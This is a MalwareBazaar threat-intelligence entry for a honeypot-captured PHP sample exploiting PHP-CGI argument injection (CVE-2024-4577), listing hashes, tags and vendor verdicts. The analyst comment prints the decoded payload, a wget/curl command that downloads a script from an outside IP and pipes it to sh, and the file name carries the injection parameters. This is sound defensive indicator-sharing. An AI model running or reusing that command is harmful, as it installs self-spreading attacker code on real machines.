MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 119e65a3d183698d071d5cfb38f991327f25bb489461dcc1e2cacc2ef402655c. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Threat unknown


Vendor detections: 4



SHA256 hash: 119e65a3d183698d071d5cfb38f991327f25bb489461dcc1e2cacc2ef402655c
SHA3-384 hash: 93f63aad6c9ede05f5c0b3ca231f6041d79bfe43a4392ae65d938a4e1ab02566c3f3da8a9d10b7fee7bdce8afd35cc86
SHA1 hash: 4148facf7372d5c24987c74e5b4e496452d47eb1
MD5 hash: 011dcdb98911e6403dd9bccd8ccdcb6f
humanhash: zulu-three-failed-angel
File name: 66.94.124.248_1777414165197759_hello.world_ADd_allow_url_include_3d1_ADd_auto_prepend_file_3dphp_input.bin
File size: 241 bytes
First seen: 2026-04-28 22:09:42 UTC
Last seen: 2026-04-29 02:42:10 UTC
File type: php
MIME type: text/x-php
ssdeep: 6:iay2AOzckHHy7nhrdfJMJ1yG2M39+fLNmeH03n:iQFkZ6+MN+41
TLSH: T1F2D0973BA2C612DA66FC0CE6408C6D9EA5B2681440800A4C337402A86128008382EDCC
Magika: php
Reporter: Blackdome
Tags: base64 base64-decode blackdome-archive blackdome.ai curl cve-2024-4577 Downloader dropper honeypot php pipe-to-sh selfrep shell-exec ssh wget


Blackdome
BlackDome honeypot (blackdome-archive). PHP-CGI argument injection (CVE-2024-4577). Static analysis only. Decoded: (wget --no-check-certificate -qO- https://217.60.241.36/sh || curl -sk https://217.60.241.36/sh) | sh -s cve_2024_4577.selfrep IOCs: https://217.60.241.36/sh | 217.60.241.36 | campaign=selfrep. VT: 1/75. #ssh #blackdome-archive #php #cve-2024-4577 #shell-exec #base64-decode

Intelligence


File Origin
# of uploads: 2
# of downloads: 111
Origin country: DE
Vendor Threat Intelligence
No detections
Verdict: Malicious
Labeled as: Trojan[Backdoor]/Script.WebShell
Threat name: Text.Browser.Generic
Status: Suspicious
First seen: 2026-04-28 22:10:16 UTC
File Type: Text (PHP)
AV detection: 1 of 24 (4.17%)
Threat level: 4/5
Please note that we are no longer able to provide a coverage score for Virus Total.

File information


The table below shows additional information about this malware sample such as delivery method and external references.
